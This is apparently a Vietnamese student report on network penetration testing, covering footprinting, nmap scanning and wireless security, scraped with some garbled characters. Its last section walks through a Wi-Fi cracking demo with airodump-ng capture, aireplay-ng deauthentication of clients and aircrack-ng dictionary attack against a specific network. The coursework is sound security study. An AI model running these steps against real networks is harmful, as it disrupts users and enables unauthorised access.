BÀI tập lớn KIỂM THỬ xâm NHẬP MẠNG

44 25 0
BÀI tập lớn KIỂM THỬ xâm NHẬP MẠNG

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THÔNG TIN I -🙞🙜🕮🙞🙜 -                                                                          BÀI TẬP LỚN KIỂM THỬ XÂM NHẬP MẠNG - NHÓM Giảng viên: Nguyễn Ngọc Điệp Nhóm trưởng Nhóm Trần Quốc Định       - B17DCAT038 11: Trần Đức Anh          - B17DCAT015 Thành viên Nhóm 11: Nguyễn Hoàng Đức - B17DCAT046 Phạm Tuấn Nam      - B17DCAT134 Nguyễn Như Thuần - B17DCAT178 Hà Nội, 2021 MỤC LỤC LỜI MỞ ĐẦU I FOOTPRINTING Sơ lược công nghệ Phương pháp Footprinting 2.1 Footprinting qua cơng cụ tìm kiếm 2.2 Footprinting sử dụng tính tìm kiếm nâng cao Google 2.3 Footprinting qua mạng xã hội .8 2.4 Footprinting qua website đối tượng 2.5 Footprinting qua Email 2.6 Footprinting WHOIS 2.7 Footprinting qua DNS 10 2.8 Footprinting qua mạng máy tính 10 2.9 Footprinting Social Engineering 11 Kết thu .11 II SCANNING 12 Sơ lược công nghệ 12 Sử dụng nmap cho mạng cục .13 Sử dụng nmap cho mạng từ xa 14 III LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY 16 Khái niệm không dây 16 1.1 Mạng không dây 16 1.2 Ưu nhược điểm mạng không dây .16 1.3 Mã hóa mạng khơng dây 16 1.4 Các thuật ngữ không dây 17 1.5 Công nghệ Wi-Fi 20 Mã hóa khơng dây .24 2.1 Mã hóa WEP .24 2.2 Mã hóa WPA .25 2.3 Mã hóa WPA2 .27 Mối đe dọa không dây .29 3.1 Các cơng kiểm sốt truy cập .29 3.2 Các công tính tồn vẹn bảo mật .29 3.3 Các công sẵn có 29 3.4 Các công xác thực 29 3.5 Tấn công điểm truy cập giả mạo .29 3.6 Liên kết sai với khách hàng .29 3.7 Tấn cơng điểm truy cập bị cấu hình sai 29 3.8 Hiệp hội trái phép .29 3.9 Tấn công kết nối Ad Hoc 30 3.10 Jamming Signal Attack 30 3.11 Hạn chế khả quản trị 30 3.12 Khả mã hóa liệu 30 3.13 Xác thực quyền người dùng .30 Phương pháp hack không dây 31 4.1 Khám phá Wi-Fi 31 4.2 Ánh xạ GPS 31 4.3 Phân tích lưu lượng khơng dây 31 4.4 Khởi động công không dây 31 Công cụ bảo mật không dây .32 5.1 Hệ thống ngăn chặn xâm nhập không dây .32 5.2 Công cụ kiểm tra bảo mật Wi-Fi .32 IV DEMO CRACK PASSWORD WIFI BẰNG AIRCRACK-NG 33 Bật chế độ Monitor card Wifi 33 Hack mật Wifi Aircrack-ng 34 V NGUỒN THAM KHẢO .40 MỤC LỤC HÌNH ẢNH Hình 1: Thơng tin Apple Hình 2: Chức tìm kiếm nâng cao Hình 3: Thơng tin người MXH .8 Hình 4: Thu thập thơng tin password Shodan.io Hình 5: Thu thập thông tin sử dụng emailTrackerPro Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com Hình 7: Thơng tin DNS apple.com .10 Hình 8: Sử dụng tracert để tìm thông tin đường đến example.com 10 Hình 9: Sử dụng lệnh “nmap -F (địa IP)” 13 Hình 10: Sử dụng nmap cho mạng từ xa .14 Hình 11: Sử dụng lệnh “nmap -sT (địa IP mục tiêu)” 15 Hình 12: Sử dụng lệnh “nmap -sT (địa IP mục tiêu) -p25-150” 15 Hình 13: Sử dụng lệnh “nmap (địa IP mục tiêu) -p80” 15 Hình 14: Mở rộng cho mạng có dây 18 Hình 15: Nhiều điểm truy cập .18 Hình 16: Điểm phát sóng 3G/4G 19 Hình 17: Các tiêu chuẩn không dây .19 Hình 18: Mở xác thực 20 Hình 19: Xác thực khóa chia sẻ 21 Hình 20: Luồng xác thực 802.1x –EAP không dây .22 Hình 21: Các biểu tượng Wi-Fi 23 Hình 22: Hoạt động mã hóa WEP 24 Hình 23: Hoạt động mã hóa WPA 26 Hình 24: So sánh giao thức mã hóa 802.11 27 Hình 25: Quá trình bắt tay bước .27 Hình 26: Mơ hình công không dây 31 Hình 27: Bật chế độ Monitor card Wifi 33 Hình 28: Kết 34 Hình 29: Kiểm tra loại bỏ xung đột 34 Hình 30: Kiểm tra giao diện mạng không dây dùng 35 Hình 31: Mạng khơng dây wlan0 35 Hình 32: Phát mạng không dây .36 Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0 36 Hình 34: BSSID, ESSID tín hiệu truyền 37 Hình 35: Ngắt kết nối thiết bị kết nối mạng không dây .38 Hình 36: Tệp hack .38 Hình 37: sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-b17dcat015/password.txt 39 Hình 38: Dị thành cơng mật .39 LỜI MỞ ĐẦU Mạng không dây công nghệ phổ biến thông dụng xã hội nay, mạng có dây dần bị thay mạng khơng dây tính dễ dàng di động Sử dụng mạng khơng dây khơng tăng tính di dộng mạng mà cịn tăng tính linh hoạt cho người dùng Trong thời kỳ đầu công nghệ không dây, mạng không dây cho khơng đủ an tồn để bào vệ thơng tin Tuy nhiên, nhiều kỹ thuật mã hóa sử dụng để bảo mật kênh thông tin liên lạc không dây I FOOTPRINTING Sơ lược công nghệ Footprinting việc thu thập thơng tin có liên quan đến mạng mục tiêu mạng đích Việc thu thập thơng tin giúp xác định cách khác để xâm nhập vào mạng mục tiêu Những thông tin thu thập từ thơng tin cá nhân công khai thông tin nhạy cảm từ nguồn bí mật Thơng thường, thu thập thơng tin thám thực công Social Engineering, công hệ thống mạng, kỹ thuật khác Phương pháp Footprinting - Footprinting qua cơng cụ tìm kiếm - Footprinting sử dụng tính tìm kiếm nâng cao Google - Footprinting qua mạng xã hội - Footprinting qua website đối tượng - Footprinting qua Email - Footprinting WHOIS - Footprinting qua DNS - Footprinting qua mạng máy tính - Footprinting Social Engineering 2.1 Footprinting qua cơng cụ tìm kiếm Thao tác hiệu thu thập thông tin thơng qua cơng cụ tìm kiếm Cơng cụ tìm kiếm trích xuất thơng tin chủ thể bạn tìm kiếm internet Bạn sử dụng cơng cụ tìm kiếm trình duyệt Google Bing, tìm kiếm tổ chức Kết thu thập thơng tin có sẵn Internet Hình 1: Thơng tin Apple 2.2 Footprinting sử dụng tính tìm kiếm nâng cao Google Một số tùy chọn nâng cao sử dụng để tìm kiếm chủ đề cụ thể cơng cụ tìm kiếm Các cơng cụ tìm kiếm nâng cao làm cho việc tìm kiếm trở nên thích hợp tập trung vào chủ đề định Hình 2: Chức tìm kiếm nâng cao 2.3 Footprinting qua mạng xã hội Hình 3: Thơng tin người MXH 2.4 Footprinting qua website đối tượng Các thơng tin thu thập dịch vụ trực tuyến xác định trước netcraft.com cách sử dụng phần mềm Burp Suite, Zaproxy, Website Informer, Firebug,… Những công cụ mang lại thơng tin loại kết nối, trạng thái thông tin sửa đổi cuối Bằng cách lấy loại thông tin này, kẻ cơng kiểm tra mã nguồn, thơng tin chi tiết nhà phát triển, cấu trúc hệ thống tệp tập lệnh Hình 4: Thu thập thơng tin password Shodan.io 2.5 Footprinting qua Email Email đóng vai trò quan trọng việc điều hành hoạt động kinh doanh tổ chức Email cách giao tiếp chuyên nghiệp phổ biến nhất, sử dụng rộng rãi người sử dụng quan Giao tiếp với đối tác, nhân viên, đối thủ cạnh tranh, nhà thầu khác có liên quan đến việc điều hành tổ chức Nội dung nội dung Do đó, email quan trọng, có giá trị kẻ cơng Hình 5: Thu thập thông tin sử dụng emailTrackerPro 2.6 Footprinting WHOIS WHOIS giúp thu thập thông tin liên quan đến tên miền, thông tin quyền sở hữu, địa IP, liệu Netblock thông tin khác Tra cứu WHOIS giúp tìm sở đứng sau tên miền mục tiêu Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com 2.7 Footprinting qua DNS Thơng tin tra cứu DNS hữu ích để xác định máy chủ lưu trữ mạng nhắm đến Có số cơng cụ có sẵn internet thực tra cứu DNS Hình 7: Thơng tin DNS apple.com 10 2.3.2 Quá trình bắt tay bước (4-Way Handshake) Trong giao thức WPA/WPA2, kết nối người dùng (Client/Supplicant) với thiết bị phát Wifi (AP/Authenticator) khởi tạo trình bắt tay bước (4-way Handshake) Hình 25: Quá trình bắt tay bước Quá trình hiểu đơn giản sau: Ban đầu thiết bị phát wifi (AP) thiết bị cần gia nhập (Client) cài đặt sẵn mật bảo vệ mạng Wifi, Pre-Shared Key 256 bit (PSK), hay gọi Pre-Shared Master Key (PMK) PMK lưu trữ AP Client, hồn tồn khơng bị truyền trình xác thực truy cập mạng, khởi tạo kết nối Quá trình 4-way Handshake bắt đầu sau Client gửi yêu cầu gia nhập mạng tới AP   Bước 1: thiết bị AP sinh chuỗi số ngẫu nhiên gọi ANonce gửi tới cho Client Bước 2: Client tự sinh chuỗi số ngẫu nhiên, gọi SNonce Lúc này, phía Client sinh Pairwise Temporal Key (PTK) dựa PMK, ANonce, SNonce, địa MAC Client (AA), địa MAC AP (SA) PTK = function(PMK, ANonce, SNonce, AA, SA) Lúc này, Client gửi cho AP tin chứa giá trị SNonce dạng plain text Đồng thời, Client sử dụng PTK vừa sinh để tính mã băm từ SNonce gọi Message Integrity Code (MIC) gửi kèm tin gửi cho AP   Bước 3: AP nhận SNonce Client AP sử dụng thuật toán giống phía Client để tính giá trị PTK Nếu phía Client AP có PMK giá trị PTK tính giống Lúc này, AP sử dụng PTK vừa tính để tính giá trị MIC từ SNonce, so sánh giá trị với MIC nhận từ Client Nếu MIC khớp nhau, chứng tỏ Client AP có PMK, tức Client phép truy cập vào mạng Wifi Lúc AP gửi cho Client tin cài đặt để Client sử dụng PTK làm khoá mã cho phiên truyền Bước 4: Client cài đặt khoá mã gửi tin xác nhận lại cho AP Quá trình 4-way Handshake kết thúc Từ tin mà Client AP trao đổi với mã 30 hoá với khoá mã vừa cài đặt, khoá mã có giá trị phiên truyền tính tốn để khơng bị sử dụng lại Quá trình xác thực giao thức chặt chẽ, thơng tin PMK hồn tồn giữ bí mật, khơng truyền q trình xác thực Vì hacker khó giải mã PMK dựa vào thông tin truyền Và hầu hết kĩ thuật công Wifi tập trung vào việc bắt lấy gói tin trình 4-way Handshake để biết tham số SNonce, ANonce, AA, SA, sau thực dị giá trị PMK kết phù hợp Việc dị tìm hiệu mật Wifi đơn giản, với trường hợp mật Wifi phức tạp việc dị tìm gần Mối đe dọa không dây 3.1 Các cơng kiểm sốt truy cập Tấn cơng kiểm sốt truy cập khơng dây cơng kẻ công xâm nhập mạng cách trốn tránh tham số kiểm soát truy cập, chẳng hạn cách giả mạo địa MAC, Rouge Điểm truy cập cấu hình sai, v.v 3.2 Các cơng tính tồn vẹn bảo mật Các cơng tồn vẹn bao gồm tiêm WEP Chèn khung liệu, công phát lại bit lật, v.v Các cơng bảo mật bao gồm phân tích lưu lượng, chiếm quyền điều khiển phiên, giả mạo, bẻ khóa, cơng MITM, v.v để đánh chặn thơng tin mật thơng tin 3.3 Các cơng sẵn có Các công sẵn sàng bao gồm công Lụt Từ chối dịch vụ để ngăn chặn người dùng hợp pháp kết nối truy cập mạng khơng dây Các cơng sẵn sàng thực cách xác thực tràn ngập, nhiễm độc ARP, công chống xác thực, công giải thể, v.v 3.4 Các công xác thực Tấn cơng xác thực nhằm mục đích đánh cắp thông tin nhận dạng mạng không dây hợp pháp khách hàng để có quyền truy cập vào mạng cách mạo danh Nó bao gồm Mật kỹ thuật bẻ khóa, đánh cắp danh tính, đốn mật 3.5 Tấn công điểm truy cập giả mạo Tấn công điểm truy cập giả mạo kỹ thuật điểm truy cập giả mạo nơi có mạng khơng dây hợp pháp thường có SSID Người dùng giả định kẻ lừa đảo điểm truy cập làm điểm truy cập hợp pháp kết nối với Sau người dùng kết nối với điểm truy cập giả mạo, tất lưu lượng truy cập trực tiếp qua kẻ cơng đánh thấy gói để giám sát hoạt động 31 3.6 Liên kết sai với khách hàng Liên kết sai máy khách bao gồm điểm truy cập giả mạo bên ngồi thơng số cơng ty mạng lưới Khi nhân viên kết nối với cách bỏ qua sách bảo mật, tất lưu lượng truy cập qua kẻ công 3.7 Tấn công điểm truy cập bị cấu hình sai Cuộc cơng điểm truy cập bị định cấu hình sai bao gồm quyền truy cập vào điểm truy cập hợp pháp cách lấy lợi cấu hình sai Cấu hình sai giống mật yếu, mặc định cấu hình mật khẩu, Mạng khơng dây khơng có mật bảo vệ, v.v 3.8 Hiệp hội trái phép Liên kết trái phép kỹ thuật khác mà người dùng bị nhiễm Trojan hoạt động điểm truy cập cho phép kẻ công kết nối mạng công ty qua Trojan kích hoạt điểm truy cập mềm thông qua kịch độc hại cho phép thiết bị máy tính xách tay biến thẻ WLAN chúng để truyền Mạng WLAN 3.9 Tấn công kết nối Ad Hoc Ad Hoc mạng khơng an tồn chúng khơng cung cấp xác thực mã hóa Kẻ cơng cố gắng xâm phạm khách hàng quảng cáo chế độ hoc Gây nhiễu tín hiệu cơng Các cơng gây nhiễu tín hiệu yêu cầu tín hiệu tần số khuếch đại cao gây từ chối công dịch vụ Thuật toán Đa truy cập / Tránh va chạm Carrier Sense yêu cầu thời gian chờ để truyền sau phát va chạm 3.10 Jamming Signal Attack Các cơng gây nhiễu tín hiệu u cầu tín hiệu tần số khuếch đại cao gây công Từ chối dịch vụ Thuật toán Đa truy cập / Tránh va chạm Carrier Sense yêu cầu thời gian chờ để truyền sau phát va chạm 3.11 Hạn chế khả quản trị mạng không dây kết nối với thiết bị sử dụng không dây, thiết bị điển tử đào nằm vùng phủ sowngs mạng khơng dây kết nối với mạng Chính đối tượng xấu dễ dàng xâm nhập vào mạng khơng dây để cơng người dùng 3.12 Khả mã hóa liệu - - Mặc dù thông tin truyền mạng mã hóa nhằm ngăn chặn việc truy cập bất hợp pháp, hacker sử dụng thiết bị wifi thay đổi để chặn liệu giải mã chúng, tìm kiếm khóa Sau truy cập trái phép vào mạng gây nên nhiều rắc rối cho hệ thống Chỉ cần máy tính có card mạng wifi bạn lướt web xâm nhập bất hợp pháp mạng máy tính gia nhập mạng 3.13 Xác thực quyền người dùng - lỗ hổng trình xác thực người dùng giúp cho kẻ cơng công vào mạng không dây 32 - Trong trình xác thực người dùng, người dùng cần phải gửi gói tin AP, sau AP gửi tin phản hồi lại cho người dùng Phương pháp hack không dây 4.1 Khám phá Wi-Fi Bước việc hack mạng không dây để thỏa hiệp tìm kiếm thơng tin nó. Thơng tin thu thập cách tạo dấu chân chủ động, thụ động sử dụng công cụ khác nhau. Dấu chân thụ động bao gồm đánh gói tin, sử dụng cơng cụ "Airwaves", "NetSurveyor" công cụ khác để tiết lộ thông tin mạng không dây trực tiếp xung quanh. Dấu chân chủ động bao gồm thăm dò điểm truy cập để có thơng tin. Trong dấu chân chủ động, kẻ cơng gửi u cầu thăm dị điểm truy cập gửi phản hồi thăm dò 4.2 Ánh xạ GPS Ánh xạ GPS trình tạo danh sách mạng Wi-Fi phát để tạo ghi sử dụng GPS. GPS theo dõi vị trí Wi-Fi phát hiện. Thơng tin sử dụng để bán cho kẻ công hack cộng đồng 4.3 Phân tích lưu lượng khơng dây Phân tích lưu lượng truy cập mạng khơng dây bao gồm bắt gói tin để tiết lộ thơng tin SSID phát sóng, phương pháp xác thực, kỹ thuật mã hóa, v.v Có số cơng cụ có sẵn để nắm bắt phân tích mạng khơng dây Wireshark, Omni peek, Commview, v.v 4.4 Khởi động công không dây Kẻ công sử dụng công cụ Aircrack-ng công khác ARP poisoning, MITM, Phân mảnh, Giả mạo MAC, Hủy xác thực, Phân tách giả mạo điểm truy cập để bắt đầu cơng vào mạng khơng dây 33 Hình 26: Mơ hình công không dây Công cụ bảo mật không dây 5.1 Hệ thống ngăn chặn xâm nhập không dây Hệ thống ngăn chặn xâm nhập không dây (WIPS) thiết bị mạng cho mạng khơng dây. Nó giám sát mạng khơng dây bảo vệ khỏi điểm truy cập trái phép thực phòng chống xâm nhập tự động. Bằng cách giám sát phổ vô tuyến, ngăn chặn điểm truy cập lừa đảo cảnh báo cho quản trị viên mạng phát Cách tiếp cận vân tay giúp tránh thiết bị có địa MAC giả mạo. WIPS bao gồm ba thành phần: Máy chủ, Cảm biến Bảng điều khiển. Điểm truy cập giả mạo cấu hình sai APs, cấu hình sai máy khách, MITM, mạng đặc biệt, giả mạo MAC, Honeypots, cơng DOS, v.v giảm thiểu cách sử dụng WIPS 5.2 Công cụ kiểm tra bảo mật Wi-Fi Sử dụng công cụ bảo mật không dây cách tiếp cận khác để bảo vệ mạng không dây. Những phần mềm bảo mật cung cấp kiểm tra mạng không dây, khắc phục cố, phát hiện, phòng chống xâm nhập, giảm thiểu mối đe dọa, phát lừa đảo, bảo vệ mối đe dọa hàng ngày, điều tra pháp y báo cáo tuân thủ. Một số công cụ bảo mật Wi-Fi phổ biến sau:     AirMagnet WiFi Analyzer Motorola’s AirDefense Services Platform (ADSP) Cisco Adaptive Wireless IPS Aruba RFProtect 34 IV DEMO CRACK PASSWORD WIFI BẰNG AIRCRACK-NG Bật chế độ Monitor card Wifi sudo airmon-ng check kill (để kiểm tra xung đột loại bỏ chúng) sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ifconfig wlan0 up [Thử nghiệm] sudo aireplay-ng -9 wlan0 Đã bắt sóng wifi lân cận 35 Hình 27: Bật chế độ Monitor card Wifi 36 Kết quả: Bật chế độ monitor thành công Hình 28: Kết Hack mật Wifi Aircrack-ng Đầu tiên ta sử dụng lệnh (sudo airmon-ng check kill) để kiểm tra xung đột loại bỏ chúng Hình 29: Kiểm tra loại bỏ xung đột 37 Sử dụng câu lệnh (sudo airmon-ng start wlan0) để thấy giao diện mạng không dây dùng Chúng ta thấy chế độ monitor (giám sát) bật Hình 30: Kiểm tra giao diện mạng khơng dây dùng Chúng ta chắn giao diện mạng không dây wlan0 câu lệnh (sudo airmon-ng) Hình 31: Mạng khơng dây wlan0 38 Tiếp đến sử dụng câu lệnh (sudo airodump-ng wlan0) để phát mạng không dây Như hình ta thấy loạt mạng không dây phát Ở loại mạng ta chọn mạng 708,709,710_T2Royalmini Chú ý kênh mà mạng chọn cụ thể kênh 11 Hình 32: Phát mạng không dây Sử dụng câu lệnh (sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0) 39 Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0 Trong -c 11 kênh chọn, 0C:4B:54:9F:74:9E địa MAC, hack1 thư mục tạo để lấy gói tin bắt được, với câu lệnh ta thấy BSSID ESSID tín hiệu truyền Hình 34: BSSID, ESSID tín hiệu truyền 40 Ta thấy có thiết bị kết nối với mạng khơng dây, ta ngắt kết nối thiết bị câu lệnh sau (sudo aireplay-ng deauth -a 0C:4B:54:9F:74:9E wlan0) Trong câu lệnh –deauth hủy xác thực người sử dụng tới mạng wifi liên tục dừng lại câu lệnh Khi người dùng kết nối lại với mạng wifi lúc bắt gói tin chứa mật wifi 41 Hình 35: Ngắt kết nối thiết bị kết nối mạng không dây Ta nhập (ls) ta nhận tệp hack hình Hình 36: Tệp hack Sử dụng câu lệnh: (sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangducb17dcat015/password.txt) Trong nguyenhoangduc-b17dcat015/password.txt địa thư viện mật 42 Hình 37: sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-b17dcat015/password.txt Kết cuối dị mật có thư viện mật Hình 38: Dị thành cơng mật V NGUỒN THAM KHẢO 43 https://www.howkteam.vn/course/13-gioi-thieu-ve-ethical-hacking khai-niem-hack-phan-loaiva-cac-giai-doan/24-dau-vet tham-do cach-tham-do-dau-vet-phan-3-2771 https://www.thekalitools.com/2016/06/su-dung-theharvester-tim-kiem-thong-tin.html https://www.cyberpratibha.com/blog/using-whois-a-command-for-information-gathering/ https://chousensha.github.io/blog/2017/06/27/dnsmap-kali-linux-tools/ https://www.youtube.com/watch?v=WfYxrLaqlN8&t=487s 44 ... tính có card mạng wifi bạn lướt web xâm nhập bất hợp pháp mạng máy tính gia nhập mạng 3.13 Xác thực quyền người dùng - lỗ hổng trình xác thực người dùng giúp cho kẻ cơng cơng vào mạng khơng dây... cơng vào mạng khơng dây 33 Hình 26: Mơ hình cơng khơng dây Cơng cụ bảo mật không dây 5.1 Hệ thống ngăn chặn xâm nhập không dây Hệ thống ngăn chặn xâm nhập không dây (WIPS) thiết bị mạng cho mạng. .. tìm gần Mối đe dọa không dây 3.1 Các cơng kiểm sốt truy cập Tấn cơng kiểm sốt truy cập khơng dây công kẻ công xâm nhập mạng cách trốn tránh tham số kiểm soát truy cập, chẳng hạn cách giả mạo

Ngày đăng: 19/08/2021, 11:04

Từ khóa liên quan

Mục lục

  • LỜI MỞ ĐẦU

  • I. FOOTPRINTING

    • 1. Sơ lược về công nghệ

    • 2. Phương pháp Footprinting

      • 2.1. Footprinting qua các công cụ tìm kiếm

      • 2.2. Footprinting sử dụng tính năng tìm kiếm nâng cao của Google

      • 2.3. Footprinting qua các mạng xã hội

      • 2.4. Footprinting qua các website của đối tượng

      • 2.5. Footprinting qua Email

      • 2.6. Footprinting bằng WHOIS

      • 2.7. Footprinting qua DNS

      • 2.8. Footprinting qua mạng máy tính

      • 2.9. Footprinting bằng Social Engineering

      • 3. Kết quả thu được

      • II. SCANNING

        • 1. Sơ lược về công nghệ

        • 2. Sử dụng nmap cho mạng cục bộ

        • 3. Sử dụng nmap cho các mạng từ xa

        • III. LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY

          • 1. Khái niệm không dây

            • 1.1. Mạng không dây

            • 1.2. Ưu nhược điểm của mạng không dây

            • 1.3. Mã hóa mạng không dây

            • 1.4. Các thuật ngữ không dây

              • 1.4.1. GMS

              • 1.4.2. Điểm truy cập

Tài liệu cùng người dùng

Tài liệu liên quan